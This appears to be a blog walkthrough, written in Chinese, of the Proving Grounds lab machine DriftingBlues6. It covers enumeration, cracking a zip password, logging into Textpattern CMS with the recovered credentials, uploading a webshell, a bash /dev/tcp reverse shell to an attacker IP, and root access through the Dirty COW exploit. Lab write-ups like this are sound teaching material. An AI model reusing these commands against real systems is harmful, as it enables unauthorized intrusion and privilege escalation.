Proving Grounds Play : DriftingBlues6 Walkthrough
Proving Grounds Play : DriftingBlues6 Walkthrough
Foothold :
- 網站 robots.txt 告訴你要去找 *.zip 檔
- 使用很大的字典檔後發現一組憑證
- 使用該組憑證成功登入 CMS textpattern
- 成功登入後上傳 webshell.php 檔案利用後拿到 Reverse Shell
PE :
- kernel 太舊,利用 Exploit 建立一個 root 使用者
- su 切換使用者成功 root
備註 : 標準的漏洞 dirtycow (髒牛)
Rustscan,└─$ rustscan -a 192.168.151.219 --scripts none --ulimit 5000 | tee rustscan
snmp check
nmap
whatweb
80 / 叫你不要駭它
80 /robots.txt 很親切的告訴你要加上 .zip 副檔名
80 /textpattern/textpattern
textpattern CMS
searchsploit 看一下發現 RCE 都要 Authenticated
所以有可能在某個 *.zip 檔案中可以發現
先嘗試測試一些常用帳號密碼發現都失敗
gobuster /
gobuster /textpattern
80 /textpattern/files
80 /textpattern/images
80 /textpattern/rpc
80 /textpattern/themes
gobuster /textpattern/textpattern 又發現一堆路徑
後續持續枚舉依舊沒有發現任何 *.zip 檔案,與相關可以利用的地方
換了一個字典檔從頭再開始爬一次,直接在根目錄發現了 zip 檔案 spammer.zip
將檔案抓回來解開看看發現要密碼,直接用 john 破解得到解壓縮密碼 myspace4
解開後發現一個 creds.txt 檔案內容寫了一個憑證 mayer:lionheart
透過拿到的憑證登入 textpattern 確認可以登入
發現可以上傳檔案的地方
上傳最愛的 webshell.php 但跳出告警,告警寫不要修改系統時間
也不知道有沒有上傳成功
點了 OK 後發現上傳成功
在 admin --> Preferences 底下點選左邊的 admin 在右邊發現上傳的路徑
/var/www/textpattern/files,即便不知道在 gobuster 時也有掃到這個路徑
去到 /textpattern/files 看到上傳的檔案如下
出現熟悉的畫面,測試一下 whoami
標準利用 bash -c "bash -i >& /dev/tcp/192.168.45.168/4444 0>&1",拿到 Reverse Shell 了
找不到 local.txt,直接開始 PE,cat /etc/passwd,沒有任何使用者
sudo -l 沒有東西,檢查 SUID
linpeas 跑起來,發現 kernel 跳紅色的字體 Linux version 3.2.0-4-amd64
參考 Exploit DB 這一篇 https://www.exploit-db.com/exploits/40839
上傳 40839.c 到靶機,跟著 Exploit-DB POC 實作 gcc -pthread 40839.c -o dirty -lcrypt
chmod +x dirty 然後執行
會建立一個使用者 firefart 然後要我們輸入自己想要的密碼
直接 su firefart 輸入剛剛設定的密碼成功提權為 root
再找一次確認沒有 local.txt,成功獲取 proof.txt
留言
張貼留言